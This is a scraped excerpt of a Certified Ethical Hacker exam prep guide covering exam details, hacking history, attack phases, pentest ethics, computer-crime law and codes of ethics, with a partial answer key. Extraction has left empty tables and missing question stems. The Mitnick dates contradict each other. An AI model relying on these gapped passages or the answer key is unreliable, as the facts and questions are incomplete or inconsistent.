Professional Documents
Culture Documents
A
cce
sse
d
tod
ay
Chapter 2
Chapter 3
- Footprinting
Chapter 5
- Scanning
Chapter 6
- Enumerating
Chapter 8
Chapter 9
Introduction
Overview
The EC-Council (www.eccouncil.org) Certified Ethical Hacker (CEH) certification is designed to qualify
skilled information system security professionals in performing ethical attacks against target
information systems to assist an organization in developing preemptive approaches against hackers.
A CEH understands the tools and methods used by malicious individuals against networks and
applies his or her skills to help organizations identify vulnerabilities in their systems.
The CEH Prep Guide prepares candidates for the CEH certification examination by providing in-depth
coverage of the latest hacking techniques required to pass the qualifying CEH 312-50 or ECO-350
examinations. The subject matter is presented in a concise, professional manner in an easy-tounderstand format and includes review questions at the end of each chapter to test a candidates
knowledge of the material. The included CD, with many hundreds of questions and answers, also
serves as a self-paced examination review and knowledge reinforcement tool.
In addition to technical content, the CEH Prep Guide emphasizes the legal and ethical requirements
associated with ethical hacking and the increased professional responsibility that goes along with the
CEH certification.
Because this book provides a focused presentation of the CEH material, it is extremely valuable to
professionals seeking to advance their careers, levels of competence, and recognition in the Ethical
Hacking and penetration testing field. The knowledge gained is applicable to commercial, industrial,
military, and government organizations.
The CEH certification also makes an individual a much-desired employee to an organization. This
professional brings the knowledge of security threats, penetration testing, vulnerability analysis, risk
mitigation, business-related issues, and countermeasures to an organization along with the means to
upgrade an organizations defenses in an effective and cost-efficient manner. The CEH has
knowledge of both offensive and defense measures in order to protect an organizations information
systems.
Exam Eligibility
To sit for the CEH certification examination, a candidate must either have attended a CEH course at
an EC-Council Accredited Training Center or prepare through self-study. In the self-study path, the
candidate must have at least two years of information system security experience endorsed by his or
her employer. If the candidate does not have two years of experience but has educational experience,
he or she can submit a request to EC-Council for consideration on a case-by-case basis.
No matter which path the CEH candidate chooses, the CEH Prep Guide is a valuable tool for
acquiring the necessary knowledge to prepare for and pass the CEH exam. The clear and detailed
explanations of key ethical hacking topics along with the hundreds of review questions greatly
increase the candidates chances of success when taking the CEH examination.
The CEH Examination Application Form (ECO-350) can be downloaded from the EC-Council website
(www.eccouncil.org/CEH.htm) and the completed form should be faxed to the EC-Council at +1-212202-3500 for verification. After verification, the candidate will receive an eligibility voucher number that
can be used to register and schedule the test at any Authorized Prometric Testing Center globally. The
cost of the examination is USD 250.
EC-Council offers two examinations: Exam 312-50 and Exam ECO-350. Only students who have
undergone training at an EC-Council Accredited Training Center are eligible to appear for the Webbased Prometric Prime Exam 312-50. Self-study candidates are authorized to sit for the ECO-350
Exam at an Authorized Prometric Testing Center. Both exams are identical in source and lead to the
CEH certification.
The examination comprises 150 questions with a four hour time period in which to complete the exam.
The exam duration is four and one half hours for Non-English speaking countries. A score of 70
percent is required to pass the exam.
The CEH Exam can be retaken with no restrictions or waiting period, if necessary. The CEH
certification is valid for 2 years and EC-Council Professional Education Credits (EPE) are required to
maintain the certification. If the candidate passes the examination, he or she will receive a welcome
kit in eight weeks time.
Additional information can be found at the EC-Council website.
The chapters in this text address the fundamentals of information system security; the rationale for
ethical hacking; relevant technologies and terminology; the legal ramifications of ethical hacking;
corresponding laws and regulations; types of attacks; and the steps involved in ethical hacking.
Terminology
The basic tenets of information system security are confidentiality, integrity, and availability,
sometimes known as the CIA triad. Confidentiality ensures that the information is not disclosed to
unauthorized persons or processes. Integrity is achieved by accomplishing the following three goals:
1. Preventing the modification of information by unauthorized users
2. Preventing the unauthorized or unintentional modification of information by authorized users
3. Preserving internal and external consistency:
a. Internal consistency refers to a logical connection among data in the system. For
example, assume that an internal database holds the number of units of a particular
item in each department of an organization. The sum of the number of units in each
department should equal the total number of units that the database has recorded
internally for the whole organization.
b. External consistency refers to a logical connection among objects in the real world and
their representations in the system. Using the example previously discussed in (a),
external consistency means that the number of items recorded in the database for each
department is equal to the number of items that physically exist in that department.
Availability ensures that a systems authorized users have timely and uninterrupted access to the
information in the system.
Additional factors that support information system security are:
When viewing an information system through the eyes of an ethical hacker, system threats,
vulnerabilities, risks, attacks, targets of evaluation, and exploits have to be taken into account. The
formal definitions of these terms are given as follows:
Threat. An event or activity that has the potential to cause harm to the information systems or
networks
Vulnerability. A weakness or lack of a safeguard that can be exploited by a threat, causing harm
to the information systems or networks; can exist in hardware, operating systems, firmware,
applications, and configuration files
Risk. The potential for harm or loss to an information system or network; the probability that a
threat will materialize
Attack. An action against an information system or network that attempts to violate the system
security policy; usually the result of a threat realized
Hactivism
Hackers and crackers have a variety of motivations and justifications for their activities. Some of these
individuals believe that information should be free and they are doing their part in this cause. Hackers
who conduct their activities for a cause are said to be practicing hactivism. Thus, their targets are any
organizations that they perceive are behind social injustice. They attack government organizations
and agencies, international economic organizations, and any other entities that they define as being
responsible for social and economic inequities. Through their hactivism, they gain publicity for their
cause and for themselves to help build their reputation. No matter what the justification, breaking into
computers and networks is illegal.
Threats
Threats from hackers can take on a variety of forms. The relevant threats are summarized in Table 11.
Table 1-1: Example Threats
Open table as spreadsheet
THREAT
DESCRIPTION
Information Warfare
Cyber Terrorism
Criminal
Violation of Data
Integrity
Late or Delayed
Processing
DESCRIPTION
Acquiring High
Sensitivity Data
Malware
Viruses, Trojan horses, worms, and other software that cause harm to
information systems
Denial or Interruption
of Service
Personnel-Related
Environmental
Hacking History
Hacking began in the 1960s at MIT when students attempted to learn more about mainframe
computing systems and improve their skills. The telephone systems were tempting to phreakers, and
one John Draper, known as Captain Crunch, used a whistle packaged in Captain Crunch cereal to
generate a 2600 Hz tone that allowed access to the AT&T long distance network. This discovery led to
Draper and others designing and building a so called blue box that generated the 2600 Hz signal
and other tones for use in making long distance phone calls without paying. Steve Jobs and Steve
Wozniak, who later founded Apple Computer, were also makers of blue boxes.
In the 1980s, hackers began to share information and stolen passwords on electronic computer
bulletin boards such as Sherwood Forest. Hacking clubs began to form with names like the German
Chaos Computer Club.
In 1982, teenagers in Wisconsin (area code 414), known as the 414 Gang, launched attacks into the
Sloan-Kettering Cancer Hospitals medical records systems. Two years later, the hacker magazine
2600 made its debut under editor Eric Corley, aka Emmanuel Goldstein. In November 1988, the
Morris Internet Worm spread through the Internet and resulted in a large scale Denial of Service
(DoS). The cause of this disruption was a small program written by Robert Tappan Morris, a 23-yearold doctoral student at Cornell University. The worm infected approximately 6,000 networked
computers.
In 1986, attacks were launched against U.S. classified computer systems by Germans affiliated with
the Chaos Computer Club and working for the KGB. This drama is described in the book The
Cuckoos Egg, written by Clifford Stoll (Clifford Stoll, The Cuckoos Egg, Doubleday, copyright 1989;
ISBN 0-385-24946-2). Stoll uncovered this activity after he noticed a 75-cent error in a computer
account at the Lawrence Livermore Laboratories.
In 1990, a hacker named Kevin Poulson, with some associates, hacked a radio stations phone
system to ensure they won a call-in contest for Porsches and other prizes. Poulson, who was also
wanted for phreaking, was apprehended and sentenced to five years in prison. He was released in
1996.
The first hacking conference, called Def Con, was held in Las Vegas in 1993 and is still held annually.
The notorious hacker Kevin Mitnick was arrested in 1995 for, among other crimes, attacks against
telephone systems. Mitnick was convicted in 1989 for computer and access device fraud but eluded
police and the FBI for more than two years while he was on probation. On Christmas 1995, he broke
into the computers of Tsutomu Shimomura in San Diego, California. Tsutomu tracked down Mitnick
after a cross-country electronic pursuit, and he was arrested by the FBI in Raleigh, North Carolina, on
February 15, 1995. Mitnick pleaded guilty to charges at his trial in March 1999, and his sentence was
nearly equal to his time served. He is now an independent information security consultant and author.
Also in 1995, Russian hacker Vladimir Leven and associates performed electronic transfers of $10
million to a number of international banks. Leven was captured and tried in the U.S. and sentenced to
three years confinement. In 1998, The Cult of the Dead Cow announced and released very effective
Trojan horse software called Back Orifice at Def Con. Back Orifice provided remote access to
Windows 98 and Windows 95 computers.
In February 2000, hackers launched Distributed DoS attacks against Yahoo!, Amazon.com, and
ZDNet. Microsoft Corporations network was hacked in October 2000 by an attacker who gained
access to software under development.
Reconnaissance
Reconnaissance is a preliminary activity in which an attacker attempts to gather information about a
target preparatory to launching an attack. It includes scanning the network from the inside or outside
without the authority to do so. In this phase, the risk to the organization is classified as notable
because it is an early attempt to gather information about the network and information systems.
Reconnaissance can either be passive or active. Passive reconnaissance is accomplished by
monitoring the network using sniffers or other mechanisms to acquire information about the network
and IT systems. The hacker can also use other means, such as dumpster diving, to acquire
information, which involves searching through an organizations or persons discarded material.
Conversely, active reconnaissance probes the network to acquire information about the operating
systems being used, available services, open ports, routers, and hosts.
Scanning
Scanning is the activity that precedes the actual attack and involves acquiring more detailed
information based on the data obtained during the reconnaissance phase. Some of the tools used in
the scanning phase include vulnerability scanners, ports scanners, and war dialers. Using these tools,
the hacker might be able to acquire information concerning users accounts, possible entry points, and
possible security mechanisms such as intrusion detection systems. They can also monitor registry
entries in operating systems to determine whether particular patches have been installed. Obtaining
this information is sometimes known as enumeration.
Examples of security scanning tools are Nmap and Nessus. Nmap can be used to identify network
computers and operating systems, enumerate open ports on potential target computers, determine
applications and versions running on potential target computers, and determine the general security
posture of a network.
The Nessus security scanner provides the capability to detect local flaws, uninstalled patches, and
weaknesses in network hosts. Nessus maintains a database of recent security vulnerabilities updated
on a daily basis.
The risk to the organization or business is considered high in the scanning phase because it enables
access to the network and consequential harmful activities. The risk can be reduced by turning off all
applications and ports that are not needed on the network computers. This practice is called deny all.
Acquiring Access
The Acquiring Access phase is where the actual attack is implemented; therefore, the business risk is
designated at the highest level. During this phase, the attacker accesses the operating system and
network and can launch denial of service attacks, buffer overflow attacks, and application-based
attacks. In addition, the attacker can insert viruses and Trojan horses and can engage in other types
of malicious behavior.
Another goal of the attacker in the Acquiring Access phase is to obtain system privileges not normally
available to the conventional user. With these elevated or escalated privileges, a hacker can execute
commands and access parts of the systems and networks reserved for individuals such as system
administrators.
Maintaining Access
Once the hacker has acquired access to the network and associated computers, he or she wants to
maintain that access. Typical activities involved in maintaining access include downloading password
files that can be used to reenter the system at a later time, installing software such as Trojan horses
and Rootkits, and installing sniffers to monitor user keystrokes. A Trojan horse is code hidden as part
of a legitimate and useful program. When the legitimate program is executed, the Trojan horse
software will run, unbeknownst to the user, and can implement malicious behavior. A Rootkit is
software that provides an attacker with the ability to access a host or network but is designed to avoid
detection.
To maintain ownership of the compromised system, an attacker might repair the vulnerability that
allowed him or her to gain access to the networks and hosts in the first place, in order to prevent other
hackers from successfully attacking the same IT elements.
Entities that perform ethical hacking functions for organizations usually fall into one of three
categories: white hats, former black hats, and independent consulting organizations. The white hat
ethical hacker has the appropriate computer skills and understanding of the black hat hacker mentality
and methods. This person might be an independent consultant hired to perform ethical hacking
activities. The former black hat hacker is, we might hope, reformed and brings actual black hat
experience to his or her work. There is a concern about this individual in that you can never be certain
that he or she will not revert to their former malicious activities. The third category of ethical hacker is
taken by consulting companies that perform a variety of services for organizations including
accounting, auditing, and information system security.
Full knowledge (Whitebox) test. The team has as much knowledge as possible about the
network and computing resources to be evaluated.
Partial knowledge (Graybox) test. The testing team has knowledge that might be relevant to a
specific type of attack by a person internal to the organization. It determines what areas and
resources that might be accessed and available to an insider.
Zero knowledge (Blackbox) test. The testing team is provided with no information and begins
the testing by gathering information on its own initiative. This type of test simulates attacks
perpetrated by outsiders. Because the ethical hacking team has to begin from scratch to gather
knowledge about the target information system, this type of test usually takes longer to execute
and, consequently, costs more to implement.
The Institute for Security and Open Methodologies (www.isecom.org/) has developed an Open Source
Security Testing Methodology Manual (OSSTMM) (www.osstmm.org) that provides guidance and
metrics for conducting security tests. It has test cases that are divided into five channels (sections)
which collectively test: information and data controls, personnel security awareness levels, fraud and
social engineering control levels, computer and telecommunications networks, wireless devices,
mobile devices, physical security access controls, security processes, and physical locations such as
buildings, perimeters, and military bases. The manual is applicable to ethical hacking, penetration
tests, vulnerability, and other types of security assessments.
Protect information uncovered during the penetration test. In the course of gaining access to
an organizations networks and computing resources, the ethical hacker will find that he or she
has access to sensitive information that would be valuable to the organizations competitors or
enemies. Therefore, this information should be protected to the highest degree possible and not
divulged to anyone, either purposely or inadvertently.
Conduct business in an ethical manner. Ethics is a relative term and is a function of a number
of variables, including background, religion, ethnicity, upbringing, and so on. However, the ethical
hacker should conduct his or activities in an ethical fashion and in the best interest of the
organization that commissioned the penetration testing. Similarly, the organization should treat
the ethical hacker with the same respect and ethical conduct.
Limitation of liability. As discussed earlier in this section, during a penetration test, the ethical
hacking team will most likely have access to sensitive files and information. The ethical hacker is
trained not to cause any harm, such as modifying files, deleting information, and so on, in the
course of his or her activities. But, since errors do occur, the organization and ethical hacker
should have terms in the contract that address the situation where harm is done inadvertently.
There should be a limitation to the liability of the ethical hacker if this scenario occurs. Another
option commonly used by consultants is to obtain an insurance policy that will cover the
consultants activities in his or her chosen profession.
Remain with the scope of the assignment. The scope of the penetration testing should be
delineated beforehand and agreed upon by all parties involved. With that accomplished, the
testing team should conduct the testing strictly within those bounds. For example, only the
networks and computing resources specified should come under penetration testing as well as
the methods and extent of trying to break in to the information system.
Develop a testing plan. As with any endeavor, the ethical hacking team should develop a test
plan in advance of the testing and have it approved by the hiring organization. The plan should
include the scope of the test, resources to be tested, support provided by the hiring organization,
times for the testing, location of the testing, the type of testing (Whitebox, Graybox, or Blackbox),
extent of the penetration, individuals to contact in the event of problems, and deliverables.
Comply with relevant laws and regulations. Business organizations are required to comply
with a variety of laws and regulations, including the Health Insurance Portability and
Accountability Act (HIPAA), Sarbanes-Oxley, and the Gramm-Leach-Bliley Act (GLBA). These
acts are one of the reasons that companies hire ethical hackers and demonstrate that they are
acting to protect their information resources. Penetration testers also have to make sure that they
comply with the appropriate laws
against the computer, crimes using the computer, and crimes in which the computer is incidental. The
following is a general listing of the most prominent types of computer crimes related to hacking:
Social engineering. Using social skills to obtain information, such as passwords or PIN
numbers, to be used in an attack against computer-based systems
Fraud. Using computers or the Internet to commit crimes (for example, by not delivering goods
paid for by a customer)
Dumpster diving. Obtaining information that has been discarded as garbage in dumpsters or at
recycling locations
Malicious code. Programs (such as viruses, Trojan horses, and worms) that, when activated,
cause harm to information systems
Spoofing of IP addresses. Inserting a false IP address into a message to disguise the original
location of the message or to impersonate an authorized source
Embezzlement. Illegally acquiring funds, usually through the manipulation and falsification of
financial statements
Use of readily available attack scripts on the Internet. Scripts that have been developed by
others and are readily available through the Internet, which can be employed by unskilled
individuals to launch attacks on networks and computing resources
A problem with prosecuting hackers that have violated the law is that many jurisdictions around the
world have different and inconsistent laws relating to computer crime. For example, a hacker might be
launching attacks against U.S. government agencies from Russia.
Some of the international organizations addressing computer crime are the United Nations, Interpol,
the European Union, and the G8 leading industrial nations.
Because of the high rate of development of new technologies, laws usually lag behind. In order to
address computer crime, law enforcement can use traditional laws against embezzlement, fraud,
DoS, and wiretapping to prosecute computer criminals.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
2.
Which of the following items is not a description of the best way to apply ethical hacking as
a defensive tool?
a. Before an attack
b. To uncover vulnerabilities
c. To provide a basis for remediation
d. After an attack to evaluate damage
3.
4.
5.
6.
7.
8.
b. Evaluation system
c. Target element
d. Target of evaluation
9.
Hackers who conduct their activities for a cause are said to be practicing:
a. Causation
b. Hactivism
c. Protesting
d. Hacking conscience
1.
Answer: a
2.
Answer: d
3.
Answer: a
4.
Answer: b
5.
Answer: d
Answer a is a vulnerability; answer b is risk; answer c is an attack.
6.
Answer: a
7.
Answer: c
Answer a is Script/Kiddie, b is a whacker, and d is a cyber-terrorist.
8.
Answer: d
9.
Answer: b
10. Answer: c
Answer a is a criminal threat, b is late or delayed processing, and d is a violation of data integrity.
11. Answer: a
12. Answer: b
13. Answer: d
14. Answer: c
15. Answer: b
Answer b describes a cracker or malicious hacker.
16. Answer: a
17. Answer: d
18. Answer: a
19. Answer: c
20. Answer: a
21. Answer: d
Answer a is not a phase of malicious hacking; the other answers are phases in malicious hacking.
22. Answer: b
23. Answer: a
24. Answer: c
25. Answer: d
The activities in answer d are usually performed in the maintaining access phase so that the
hacker can reenter the system at a later time.
26. Answer: d
27. Answer: b
28. Answer: c
Answer a, gray hat, is a hacker who, at times, will not break the law and, in fact, might help to
defend a network. At other times, the gray hat hacker reverts to black hat activities. Answer b, the
white hat hacker, has exceptional computer skills and uses his or her abilities to increase the
security posture of information systems and defend them from malicious attacks. Answer d is a
made-up distracter.
29. Answer: a
30. Answer: b
31. Answer: a
Administrative Law
Administrative laws are categorized by subject matter in administrative codes or chronologically in
administrative registers. At the federal level, these categorizations are respectively called the Code of
Federal Regulations (C.F.R.) and the Federal Register (Fed. Reg.). A citation to the Code of Federal
Regulations comprises the following elements:
The number of the C.F.R. title
The abbreviation for the Code (C.F.R.)
The section number
The year of publication
For example, the reference 10 C.F.R. 100.4 (1998) points to Section 100.4 in Title 10 of the 1998
edition of the Code of Federal Regulations.
Statutory Law
In the U.S., statutory laws are arranged as statutory codes, which are organized according to subject
matter, or session laws, which are arranged in order of enactment. Statutory codes are held in the
United States Code (U.S.C.), and session laws are found in the Statutes at Large (Stat.). State
statutory laws are also subdivided according to these headings.
Federal statutes cite the United States Code, and this citation includes:
The Code title number (each title is a grouping of statutes dealing with a particular subject matter)
The abbreviation for the code (U.S.C.)
The statutory section number within the title
The date of the edition or supplement
For example, 18 U.S.C. 1000 (1998) refers to Section 1000 in Title 18 of the 1998 edition of the
United States Code. Title 18 in the United States Code refers to Crimes and Criminal Procedures.
Other titles are as follows:
Title 11. Bankruptcy
Title 12. Banks and Banking
Title 15. Commerce and Trade
Title 17. Copyrights
Title 26. Internal Revenue Code
Title 31. Money and Finance
Title 42. The Public Health and Welfare
Title 49. Transportation
Civil (tort) law. These laws address damage or loss to an individual or an organization.
Punishment cannot include imprisonment, but consists of financial awards comprising punitive,
compensatory, and statutory damages.
Criminal law. These laws cover individual actions that violate government laws put in place to
protect the public. Punishment can consist of imprisonment or financial penalties.
Whether the offense was committed for purposes of commercial advantage or private financial
benefit
Whether the defendant acted with malicious intent to cause harm in committing the offense
The extent to which the offense violated the privacy rights of individuals harmed
Whether the offense involved a computer used by the government in furtherance of national
defense, national security, or the administration of justice
Whether the violation interfered with or disrupted a critical infrastructure, or whether it was
intended to have this effect
Whether the violation created a threat to public health or safety or injury to any person or whether
it was intended to have this effect
1970 U.S. Racketeer Influenced and Corrupt Organization (RICO) Act. Addresses both
criminal and civil crimes involving racketeers influencing the operation of legitimate businesses;
crimes cited in this act include mail fraud, securities fraud, and the use of a computer to
perpetrate fraud.
1974 U.S. Federal Privacy Act (amended in 1980). Applies to federal agencies; provides for the
protection of information about private individuals that is held in federal databases, and grants
access by the individual to these databases. The law imposes civil and criminal penalties for
violations of the provisions of the Act.
1978 Foreign Intelligence Surveillance Act (FISA). FISA can be used to conduct electronic
surveillance and physical searches under a court order and without a warrant in cases of
international terrorism, spying, or sabotage activities that are conducted by a foreign power or its
agent. FISA is not intended for use in prosecuting U.S. citizens.
1984 U.S. Medical Computer Crime Act. Addresses illegal access or alteration of computerized
medical records through phone or data networks.
1984 (strengthened in 1986 and 1994) First U.S. Federal Computer Crime Law Passed.
Covers classified defense or foreign relations information, records of financial institutions or credit
reporting agencies, and government computers. Unauthorized access or access in excess of
authorization became a felony for classified information and a misdemeanor for financial
information. This law made it a misdemeanor to knowingly access a U.S. Government computer
without or beyond authorization if the U.S. governments use of the computer would be affected.
1986 (amended in 1996) U.S. Computer Fraud and Abuse Act. Clarified the 1984 law and added
three new crimes:
1. When use of a federal interest computer furthers an intended fraud
2. When altering, damaging, or destroying information in a federal interest computer or
preventing the use of the computer or information that causes a loss of $1,000 or more or
could impair medical treatment
1987 U.S. Computer Security Act. Places requirements on federal government agencies to
conduct security-related training, to identify sensitive systems, and to develop a security plan for
those sensitive systems. A category of sensitive information called Sensitive But Unclassified
(SBU) has to be considered. This category, formerly called Sensitive Unclassified Information
(SUI), pertains to information below the governments classified level that is important enough to
protect, such as medical information, financial information, and research and development
knowledge. This act also partitioned the governments responsibility for security between the
National Institute of Standards and Technology (NIST) and the National Security Agency (NSA).
NIST was given responsibility for information security in general, primarily for the commercial and
SBU arenas, and NSA retained the responsibility for cryptography for classified government and
military applications.
The Computer Security Act established the National Computer System Security and Privacy
Advisory Board (CSSPAB), which is a 12-member advisory group of experts in computer and
telecommunications systems security.
1990 United Kingdom Computer Misuse Act. Defines computer-related criminal offenses.
1991 U.S. Federal Sentencing Guidelines. Provides punishment guidelines for those found
guilty of breaking federal law. These guidelines are as follows:
1. Treat the unauthorized possession of information without the intent to profit from the
information as a crime.
2. Address both individuals and organizations.
3. Make the degree of punishment a function of the extent to which the organization has
demonstrated due diligence (due care or reasonable care) in establishing a prevention
and detection program.
4. Invoke the prudent man rule that requires senior officials to perform their duties with the
care that ordinary, prudent people would exercise under similar circumstances.
5. Place responsibility on senior organizational management for the prevention and detection
programs, with fines of up to $290 million for nonperformance.
1992 OECD Guidelines to Serve as a Total Security Framework. The Framework includes
laws, policies, technical and administrative measures, and education.
1994 U.S. Communications Assistance for Law Enforcement Act. Requires all
communications carriers to make wiretaps possible.
1994 U.S. Computer Abuse Amendments Act. This act accomplished the following:
1. Changed the federal interest computer to a computer used in interstate commerce or
communications
2. Covered viruses and worms
3. Included intentional damage as well as damage done with reckless disregard of
substantial and unjustifiable risk
4. Limited imprisonment for the unintentional damage to one year
5. Provided for civil action to obtain compensatory damages or other relief
Paperwork Reduction Acts of 1980, 1995. The 1980 act amended in 1995 provides Information
Resources Management (IRM) directives for the U.S. Government. This law established the
Office of Information and Regulatory Affairs (OIRA) in the Office of Management and Budget
(OMB). One result of the Act is to require government agencies to apply information technology
systems to increase productivity, improve delivery of services, and minimize waste. The OMB
was assigned the responsibility for improving government efficiency through the application of
new technologies and was also made responsible for developing guidance on information
security for government agencies.
1995 Council Directive (Law) on Data Protection for the European Union (EU). Declares that
each EU nation is to enact protections similar to those of the OECD Guidelines
1996 U.S. Economic and Protection of Proprietary Information Act. Addresses industrial and
corporate espionage and extends the definition of property to include proprietary economic
information in order to cover the theft of this information
1996 U.S. National Information Infrastructure Protection Act. Enacted in October 1996 as
part of Public Law 104-294, it amended the Computer Fraud and Abuse Act, which is codified at
18 U.S.C. 1030. The amended Computer Fraud and Abuse Act is patterned after the OECD
Guidelines for the Security of Information Systems and addresses the protection of the
confidentiality, integrity, and availability of data and systems. This path is intended to encourage
other countries to adopt a similar framework, thus creating a more uniform approach to
addressing computer crime in the existing global information infrastructure.
1996 Information Technology Management Reform Act (ITMRA) of 1996, National Defense
Authorization Act for Fiscal Year 1996 (Clinger-Cohen Act). ITMRA is also known as the
Clinger-Cohen Act. This legislation relieves the General Services Administration of responsibility
for procurement of automated systems and contract appeals. OMB is charged with providing
guidance, policy, and control for information technology procurement. With the Paperwork
Reduction Act, as amended, this Act delineates OMBs responsibilities for overseeing agency
practices regarding information privacy and security.
1996, Title I, Economic Espionage Act. The Economic Espionage Act addresses the numerous
acts concerned with economic espionage and the national security aspects of the crime. The
theft of trade secrets is also defined in the Act as a federal crime.
1998 U.S. Digital Millennium Copyright Act (DMCA). The DMCA prohibits trading,
manufacturing, or selling in any way intended to bypass copyright protection mechanisms. It also
addresses ISPs that unknowingly support the posting of copyrighted material by subscribers. If
the ISP is notified that the material is copyrighted, the ISP must remove the material. Additionally,
if the posting party proves that the removed material was of lawful use, the ISP must restore the
material and notify the copyright owner within 14 business days.
2000 U.S. Congress Electronic Signatures in Global and National Commerce Act (ESIGN).
ESIGN facilitates the use of electronic records and signatures in interstate and foreign commerce
by ensuring the validity and legal effect of contracts entered into electronically. An important
provision of the act requires that businesses obtain electronic consent or confirmation from
consumers to receive information electronically that a law normally requires to be in writing. The
legislation is intent on preserving the consumers rights under consumer protection laws and went
to extraordinary measures to meet this goal. Thus, a business must receive confirmation from the
consumer in electronic format that the consumer consents to receiving information electronically
that used to be in written form. This provision ensures that the consumer has access to the
Internet and is familiar with the basics of electronic communications.
USA Provide Appropriate Tools Required to Intercept and Obstruct Terrorism (PATRIOT)
Act. This act gives the U.S. government new powers to subpoena electronic records and to
monitor Internet traffic. In monitoring information, the government can require the assistance of
ISPs and network operators. This monitoring can extend even into individual organizations. In the
Patriot Act, Congress permits investigators to gather information about email without having to
show probable cause that the person to be monitored has committed a crime or was intending to
commit a crime. Routers, servers, backups, and so on now fall under existing search and seizure
laws. A new twist is delayed notification of a search warrant.Under the Patriot Act, if it is
suspected that notification of a search warrant would cause a suspect to flee, a search can be
conducted before notification of a search warrant is given.Specifically, this act permits:
1. The subpoena of electronic records
2. The monitoring of Internet communications
3. The search and seizure of information on live systems (including routers and servers),
backups, and archives
Generally Accepted Systems Security Principles (GASSP). These items are not laws but are
accepted principles that have a foundation in the OECD Guidelines:
1. Computer security supports the mission of the organization.
2. Computer security is an integral element of sound management.
3. Computer security should be cost-effective.
4. Systems owners have security responsibilities outside their organizations.
5. Computer security responsibilities and accountability should be made explicit.
6. Computer security requires a comprehensive and integrated approach.
7. Computer security should be periodically reassessed.
8. Computer security is constrained by societal factors.
2002 E-Government Act. Title III, the Federal Information Security Management Act
(FISMA). This Act was written to:
1. Provide a comprehensive framework for ensuring the effectiveness of information security
controls over information resources that support Federal operations and assets
2. Recognize the highly networked nature of the current Federal computing environment and
provide effective government-wide management and oversight of the related information
security risks, including coordination of information security efforts throughout the civilian,
national security, and law enforcement communities
3. Provide for development and maintenance of minimum controls required to protect
Federal information and information systems
4. Provide a mechanism for improved oversight of Federal agency information security
programs
There must be a way for a person to find out what information about them is in a record and
how it is used.
Any organization creating, maintaining, using, or disseminating records of identifiable
personal data must ensure the reliability of the data for their intended use and must take
precautions to prevent misuses of that data.
Ethics
Ethics is concerned with standards of behavior and considerations of what is right and what is
wrong. It is difficult to state hard ethical rules because definitions of ethical behavior are a function of
an individuals experience, background, nationality, religious beliefs, culture, family values, and so on.
Ethical computing should incorporate ethical norms. Furthermore, if an individual is a certified
professional in ethical computing or information systems security, that individual is required to adhere
to higher ethical and legal standards than noncertified personnel.
Hackers sometimes justify their attacks on computers with the following rationale:
By writing viruses, I am exercising freedom of speech.
By penetrating other information systems, I am increasing my knowledge.
Information wants to be free, and I am helping in that mission.
Information system software should prevent me from inflicting harm.
Computer files should always be backed up, so files that I might damage can be retrieved.
Because manufacturers make most software easy to copy, it is OK for me to copy it and use
unlicensed software.
A variety of professional and certifying organizations involving information systems have developed
their own codes of ethics. Some examples of these codes are given in the following list:
The EC-Council Code of Ethics Keep private any confidential information gained in her/his
professional work (in particular, as it pertains to client lists and client personal information). Not
collect, give, sell, or transfer any personal information (such as name, e-mail address, Social
Security number, or other unique identifier) to a third party without client prior consent.
Protect the intellectual property of others by relying on her/his own innovation and efforts, thus
ensuring that all benefits vest with its originator.
Disclose to appropriate persons or authorities potential dangers to any e-commerce clients, the
Internet community, or the public, that she/he reasonably believes to be associated with a
particular set or type of electronic transactions or related software or hardware.
Provide service in their areas of competence, being honest and forth-right about any limitations of
her/his experience and education. Ensure that she/he is qualified for any project on which he/she
works or proposes to work by an appropriate combination of education, training, and experience.
Never knowingly use software or process that is obtained or retained either illegally or unethically.
Not engage in deceptive financial practices such as bribery, double billing, or other improper
financial practices.
Use the property of a client or employer only in ways properly authorized, and with the owners
knowledge and consent.
Disclose to all concerned parties those conflicts of interest that cannot reasonably be avoided or
escaped.
Ensure good management for any project he/she leads, including effective procedures for
promotion of quality and full disclosure of risk.
Add to the knowledge of the e-commerce profession by constant study, share the lessons of
her/his experience with fellow EC-Council members, and promote public awareness of benefits of
electronic commerce.
Conduct herself/himself in the most ethical and competent manner when soliciting professional
service or seeking employment, thus meriting confidence in her/his knowledge and integrity.
Ensure ethical conduct and professional care at all times on all professional assignments without
prejudice.
Not associate with malicious hackers nor engage in any malicious activities.
Not purposefully compromise or cause to be compromised the client organizations systems in
the course of your professional dealings.
Ensure all penetration testing activities are authorized and within legal limits.
Not partake in any black hat activity or be associated with any black hat community that serves to
endanger networks.
Not be part of any underground hacking community for purposes of preaching and expanding
black hat activities.
(ISC)2 Code of Ethics Canons Protect society, the commonwealth, and the infrastructure.
Act honorably, honestly, justly, responsibly, and legally.
Provide diligent and competent service to the principals.
Advance and protect the profession.
That I have an obligation to my fellow members, therefore, I shall uphold the high ideals of
AITP as outlined in the Association Bylaws. Further, I shall cooperate with my fellow
members and shall treat them with honesty and respect at all times.
That I have an obligation to society and will participate to the best of my ability in the
dissemination of knowledge pertaining to the general development and understanding of
information processing. Further, I shall not use knowledge of a confidential nature to further
my personal interest, nor shall I violate the privacy and confidentiality of information
entrusted to me or to which I may gain access.
That I have an obligation to my College or University, therefore, I shall uphold its ethical and
moral principles.
That I have an obligation to my employer whose trust I hold, therefore, I shall endeavor to
discharge this obligation to the best of my ability, to guard my employers interests, and to
advise him or her wisely and honestly.
That I have an obligation to my country, therefore, in my personal, business, and social
contacts, I shall uphold my nation and shall honor the chosen way of life of my fellow
citizens.
I accept these obligations as a personal responsibility and as a member of this Association. I
shall actively discharge these obligations and I dedicate myself to that end.
The Computer Ethics Institutes Ten Commandments of Computer Ethics
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other peoples computer work.
3. Thou shalt not snoop around in other peoples computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
6. Thou shalt not copy or use proprietary software for which you have not paid.
7. Thou shalt not use other peoples computer resources without authorization or the proper
compensation.
8. Thou shalt not appropriate other peoples intellectual output.
9. Thou shalt think about the social consequences of the program you are writing for the
system you are designing.
10. Thou shalt use a computer in ways that ensure consideration and respect for your fellow
humans.
The Internet Architecture Board (IAB) Ethics and the Internet (RFC 1087) Access to and
use of the Internet is a privilege and should be treated as such by all users of the system. Any
activity is defined as unacceptable and unethical that purposely:
Seeks to gain unauthorized access to the resources of the Internet
Destroys the integrity of computer-based information
Disrupts the intended use of the Internet
Wastes resources such as people, capacity, and computers through such actions
Compromises the privacy of users
Involves negligence in the conduct of Internet-wide experiments
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
